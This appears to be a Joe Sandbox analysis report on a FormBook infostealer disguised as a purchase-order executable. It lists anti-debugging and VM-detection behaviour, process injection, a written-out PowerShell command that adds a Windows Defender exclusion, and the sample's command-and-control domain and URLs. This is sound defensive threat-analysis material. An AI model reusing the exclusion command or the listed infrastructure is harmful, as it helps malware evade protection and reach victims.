          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004088B0 rdtsc
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4442
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2845
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep time: -17524406870024063s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: powershell.exe, 00000006.00000003.343279532.0000000005825000.00000004.00000001.sdmpBinary or memory string: Hyper-V
          Source: powershell.exe, 00000006.00000003.343279532.0000000005825000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess information queried: ProcessInformation

          Anti Debugging:

          barindex
          Contains functionality to hide a thread from the debuggerShow sources
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_015096C8 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,0150B5EF,00000000,00000000
          Hides threads from debuggersShow sources
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeThread information set: HideFromDebugger
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 12_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeCode function: 0_2_00BBD91C LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Adds a directory exclusion to Windows DefenderShow sources
          Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeMemory written: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe' -Force
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeProcess created: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeQueries volume information: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exe VolumeInformation
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\Desktop\Purchase_order_397484658464974945648447564845.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.267253843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.293197269.00000000044EF000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.289325554.0000000003F69000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection111Masquerading11OS Credential DumpingSecurity Software Discovery331Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion14LSASS MemoryVirtualization/Sandbox Evasion14Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsTimestomp1DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 356528 Sample: Purchase_order_397484658464... Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 27 Found malware configuration 2->27 29 Malicious sample detected (through community Yara rule) 2->29 31 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->31 33 7 other signatures 2->33 7 Purchase_order_397484658464974945648447564845.exe 17 3 2->7         started        process3 dnsIp4 25 coroloboxorozor.com 104.21.71.230, 49711, 80 CLOUDFLARENETUS United States 7->25 35 Adds a directory exclusion to Windows Defender 7->35 37 Tries to detect virtualization through RDTSC time measurements 7->37 39 Hides threads from debuggers 7->39 41 2 other signatures 7->41 11 cmd.exe 1 7->11         started        13 powershell.exe 25 7->13         started        15 WerFault.exe 23 9 7->15         started        17 Purchase_order_397484658464974945648447564845.exe 7->17         started        signatures5 process6 process7 19 conhost.exe 11->19         started        21 timeout.exe 1 11->21         started        23 conhost.exe 13->23         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase_order_397484658464974945648447564845.exe41%VirustotalBrowse
          Purchase_order_397484658464974945648447564845.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
          Purchase_order_397484658464974945648447564845.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          12.2.Purchase_order_397484658464974945648447564845.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html0%Avira URL Cloudsafe
          http://coroloboxorozor.com/base/23DEF5FFA542BB2D1BCA37F7C5ECC686.html0%Avira URL Cloudsafe
          http://coroloboxorozor.com0%Avira URL Cloudsafe
          www.aubonmarcheduparc.com/rina/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          coroloboxorozor.com
          104.21.71.230
          truefalse
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.htmlfalse
            • Avira URL Cloud: safe
            unknown
            http://coroloboxorozor.com/base/23DEF5FFA542BB2D1BCA37F7C5ECC686.htmlfalse
            • Avira URL Cloud: safe
            unknown
            www.aubonmarcheduparc.com/rina/true
            • Avira URL Cloud: safe
            low

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://coroloboxorozor.comPurchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePurchase_order_397484658464974945648447564845.exe, 00000000.00000002.286130454.0000000002E61000.00000004.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              104.21.71.230
              unknownUnited States
              13335CLOUDFLARENETUSfalse

              General Information

              Joe Sandbox Version:31.0.0 Emerald
              Analysis ID:356528
              Start date:23.02.2021
              Start time:09:35:46
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 10m 14s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Purchase_order_397484658464974945648447564845.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:35
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@12/9@1/1
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 47.3% (good quality ratio 45.4%)
              • Quality average: 76.7%
              • Quality standard deviation: 28%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.255.188.83, 92.122.145.220, 104.42.151.234, 13.64.90.137, 52.147.198.201, 184.30.20.56, 51.104.139.180, 8.253.207.120, 8.253.95.121, 8.248.139.254, 8.253.95.249, 8.248.119.254, 20.54.26.129, 204.79.197.200, 13.107.21.200, 51.11.168.160, 92.122.213.247, 92.122.213.194
              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:37:10API Interceptor1x Sleep call for process: WerFault.exe modified
              09:37:22API Interceptor31x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              104.21.71.2300603321WG_0_1 pdf.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
              VIws8bzjD5.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
              quotation_PR # 00459182..exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
              PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
              PAYRECEIPT.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
              New Order.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
              TT.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
              Payment_pdf.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
              TT.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
              purchase order 1.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
              telex transfer.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
              ORDER PURCHASE ITEMS.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
              Doc_3975465846584657465846486435454,pdf.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
              CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
              CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
              Download_quotation_PR #371073.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
              CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
              • coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
              PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
